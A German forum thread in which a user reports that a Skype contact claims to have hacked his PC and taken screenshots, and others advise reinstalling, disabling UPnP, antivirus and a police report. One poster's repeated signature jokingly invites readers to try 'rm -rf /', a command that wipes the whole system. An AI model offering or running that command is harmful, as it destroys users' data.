Sponsor-Board.de
Antwort schreiben  Thema schreiben 
 Seiten (2): « Erste 1 2 Nächste > Letzte »

0 Byte Injection und jemad hackt meinen pc?

Verfasser Nachricht

Beiträge: 94
Bewertung: 1
Registriert seit: Sep 2012
Status: offline


Beitrag: #1
0 Byte Injection und jemad hackt meinen pc?

Hallo,

wie ich eben mit Erschrecken feststellen musste, hat sich gestern jemand unerlaubt Zugriff auf meinen PC erlaubt.

Er sah dass was ich mache, und was er noch alles machen konnte will ich erst gar nicht wissen...

Ich hatte ihn in Skype und dann sagt er mir dass er aus Langweile per 0 Byte Injection (wtf?) meinen PC gehackt hat, Screenshots gemacht hat usw..

Was bitte ist diese 0 Byte Injection und vor allem wie kann ich mich vor weiteren Angriffen schützen?

Heute Mittag werde ich meinen PC erstmal formatieren, ich denke aber nicht dass das Problem damit gelöst ist..

Danke!

Dieser Beitrag wurde zuletzt bearbeitet: 14.06.2013 16:01 von krayyzn.

14.06.2013 06:40
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 339
Bewertung: 10
Registriert seit: Jun 2013
Status: offline


Beitrag: #2
RE: 0 Byte Injection und jemad hackt meinen pc?

Hallo krayyzn,

zu aller erst gebe ich dir mal ein Link an die Hand wo du nachlesen und verstehen kannst, was mit deinem PC geschehen ist.
[Link: Registrierung erforderlich]
Wenn du geschäftlich mit Ihm zu tun hattest, rate ich dir heute ein Anzeige zu erstatten!

Wenn du deinen Computer formatierst und dein Betriebssystem danach erneut installierst ist dein Computer wieder sauber.
Ich würde dir raten alle Daten, die du mit deinem Bekannten da austauscht zu blocke und ihn überall sperren.

Außerdem wenn du wichtige Bankdaten auf deinem Computer hast, so gehe jetzt zur Bank und lasse alles sperren.
Girokonto
Kreditkarte
etc.
alles was dir wichtig ist in diesem Fall.


Mit freundlichen Grüßen

(͡° ͜ʖ ͡°)


Zum ausprobieren in der Shell:
rm -rf /

Dieser Beitrag wurde zuletzt bearbeitet: 14.06.2013 07:06 von Atchu.

14.06.2013 07:04
 
Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 94
Bewertung: 1
Registriert seit: Sep 2012
Status: offline


Beitrag: #3
RE: 0 Byte Injection und jemad hackt meinen pc?

Verstehe davon Null, aber gut..

Werde dann meinen PC formatieren und hoffen dass sich das damit erledigt hat...

Eine Frage habe ich aber noch, was kann ich dagegen machen?

14.06.2013 07:31
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 506
Bewertung: 2
Registriert seit: May 2009
Status: Abwesend


Beitrag: #4
RE: 0 Byte Injection und jemad hackt meinen pc?

Ich frag mich zwar wie eine 0 Byte Injection ohne laufenden Webserver ( gehe ich von aus ) und auf Windows ( denke Linux nutzt der ersteller nicht ) möglich sind aber nungut Tongue Bestimmt nur nen billiger Skype Hack der die Bildschrimfreigabe erteilt.. mehr aber auch nicht..

Achso die Screenshots hätte ich mal gerne gesehen ... Smile


[Link: Registrierung erforderlich]

Dieser Beitrag wurde zuletzt bearbeitet: 14.06.2013 08:06 von rZr.

14.06.2013 07:58
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 339
Bewertung: 10
Registriert seit: Jun 2013
Status: offline


Beitrag: #5
RE: 0 Byte Injection und jemad hackt meinen pc?

krayyzn schrieb:
Eine Frage habe ich aber noch, was kann ich dagegen machen?


Das fängt zu aller erst meistens bei dir selber an.
Ich schlage vor du guckst mal in deinem Router ob du evtl. UPnP aktiviert hast und deaktivierst diesen Dienst.
Aber Vorsicht, kann dazu führen das einige Programme nicht mehr ordnungsgemäß im Internet laufen.

Danach würde ich gucken, dass du dir eine vernünftigen Virenscanner zulegst. Die Kunden, die ich betreue, waren bislang alle mit TrendMicro sehr zufrieden.

Dann musst auch noch drauf achten, mit wem du im Internet kommunizierst. Dein Geschäftskollege scheint ja doch noch ein ziemliches Kind zu sein, wenn er so etwas meint abziehen zu müssen.

rZr schrieb:
Ich frag mich zwar wie eine 0 Byte Injection ohne laufenden Webserver ( gehe ich von aus ) und auf Windows ( denke Linux nutzt der ersteller nicht ) möglich sind aber nungut Tongue Bestimmt nur nen billiger Skype Hack der die Bildschrimfreigabe erteilt.. mehr aber auch nicht..


Kann sein, kann aber auch nicht sein.
Das Risiko möchte ich nicht eingehen müssen.

Denn schon morgen könnten seine Kreditkarten Daten samt Pin's im Internet zum Kauf angeboten werden.

Sicher ist sicher!


Mit freundlichen Grüßen

(͡° ͜ʖ ͡°)


Zum ausprobieren in der Shell:
rm -rf /

14.06.2013 08:10
 
Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 506
Bewertung: 2
Registriert seit: May 2009
Status: Abwesend


Beitrag: #6
RE: 0 Byte Injection und jemad hackt meinen pc?

Glaube kaum, dass sich einer die Mühe macht einen PC zu hacken für ne Kreditkarte Smile und man muss schon sehr leichtsinnig mit dem INternet umgehen um sich eine Bedrohung einzufangen..


[Link: Registrierung erforderlich]

Dieser Beitrag wurde zuletzt bearbeitet: 14.06.2013 08:33 von rZr.

14.06.2013 08:32
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 339
Bewertung: 10
Registriert seit: Jun 2013
Status: offline


Beitrag: #7
RE: 0 Byte Injection und jemad hackt meinen pc?

Das sagten sie alle...

Irgendwann saßen sie aber doch alle früher oder später beim Informatiker des Vertrauens.
Bei einer Tasse Kaffee wurde dann das Herz ausgeschüttet, dass die Konten leer sind, die Bank sperrt sich und das Kreditkartenlimit ist überzogen, währenddessen der PC gerade neu installiert wird.

Was meinst du wie die Kreditkarten, die man im Internet kaufen kann zusammen kommen?
Die haben sicherlich keine Bankserver ins Visier genommen.

Nein! Die Opfer sind kleine Endanwender wie du o. sonst wer es ist.
Die, die gerne Ihre Kreditkarte einscannen, da man sich die ja so schlecht merken kann und unter der Aufschrift "Kreditkarte.jpg" auf den Desktop legen.

Das geht schneller als du glauben kannst. Irgendwann erwischt dich auch ein ganz frischer Exploit, der noch nicht von den namenhaften Herstellern im Definition Update mit eingepflegt wurde.

Ich währe mit diesen Aussagen ganz, ganz vorsichtig...

:-)


Mit freundlichen Grüßen

(͡° ͜ʖ ͡°)


Zum ausprobieren in der Shell:
rm -rf /

Dieser Beitrag wurde zuletzt bearbeitet: 14.06.2013 08:42 von Atchu.

14.06.2013 08:41
 
Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 94
Bewertung: 1
Registriert seit: Sep 2012
Status: offline


Beitrag: #8
RE: 0 Byte Injection und jemad hackt meinen pc?

Kreditkarte usw. auf jeden Fall nicht, besitze ich nicht und Online-Banking auch nicht, die einzige Absicht von ihm war wahrscheinlich Screenshots zu machen, von was weiß ich nicht

Ich denke der Typ ist ein bisschen krank, der nimmt meine Stimme auf und schickt mir dann .mp3 darein oder eine .jpg Datei, da war ich dann wahrscheinlich ein wenig zu naiv beim Akzeptieren von den Dateien.

Das mit dieser 0 Byte Injection bezweifle ich auch, da ich absolut nichts mit Webserverm zu tun gehabt habe mit ihm, deswegen tippe ich auch auf einen Skype-Hack, er könnte mir nämlich nur sagen was ich gerade mache..

Fest steht, dass ich gleich meinen Computer formatieren werde und in Skypd habe ich ihn bereits geblockt, nur das doofe ist, dass er jetzt Screenshots von mir und meinen Sachen hat, eventuell kA auch von privaten Dingen, wer weiß wie lange er das schon macht..

Danke für eure Hilfe!

14.06.2013 10:25
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 339
Bewertung: 10
Registriert seit: Jun 2013
Status: offline


Beitrag: #9
RE: 0 Byte Injection und jemad hackt meinen pc?

Hallo krayyzn,

wie ich es dir bereits nahe gelegt habe, sollte es dich stark stören und an dir nagen, so steht es dir immer noch frei eine Anzeige gegen diese Person zu erstatten.
Hier liegt offensichtlich ein unbefugter Eingriff in die Privatsphäre vor.
Ich glaube dieser würde dann auch ganz schön doof aus der Wäsche schauen, wenn er Post bekommt.

Wink


Mit freundlichen Grüßen

(͡° ͜ʖ ͡°)


Zum ausprobieren in der Shell:
rm -rf /

14.06.2013 11:30
 
Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren

Beiträge: 947
Bewertung: 8
Registriert seit: Feb 2012
Status: offline


Beitrag: #10
RE: 0 Byte Injection und jemad hackt meinen pc?

Ich kann dir empfehlen, dich im "Trojaner-Board" zu registrieren. Dort wird verdammt schnell - von Leuten die dir auch wirklich helfen - ausführlich geholfen! Wenn du es aber schnell machen willst, rate Ich dir deinen PC zu formatieren.

MfG, Max


[Link: Registrierung erforderlich]
[Link: Registrierung erforderlich] - Blog über Linux und die IT Welt
-------------------------------------------------------------------------------------------------------
Facebook: [Link: Registrierung erforderlich]
Linux-Scout.de: [Link: Registrierung erforderlich]

14.06.2013 11:50
 
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden Diese Nachricht in einer Antwort zitieren
Antwort schreiben  Thema schreiben 
 Seiten (2): « Erste 1 2 Nächste > Letzte »

Möglicherweise verwandte Themen...
Thema: Verfasser Antworten: Ansichten: Letzter Beitrag
  Möchte meinen PC Upgraden EG ColdSparkGG 27 3.271 02.04.2014 23:11
Letzter Beitrag: EG ColdSparkGG

 Druckversion anzeigen
 Thema einem Freund senden
 Thema abonnieren
 Thema zu den Favoriten hinzufügen

Sponsor-Board.de

Community
Über uns
Partner
Powered by Mybb: Copyright 2002-2024 by MyBB Group - Deutsche-Übersetzung von Mybb.de
 
© 2007-2024 Sponsor-Board.de - Hosted by OVH

Willkommen auf SB!   Sie benötigen ein Sponsoring?   1. Anmelden   2. Sponsoring-Anfrage erstellen   3. Nachrichten von Sponsoren erhalten   Kostenlos!   Jetzt registrieren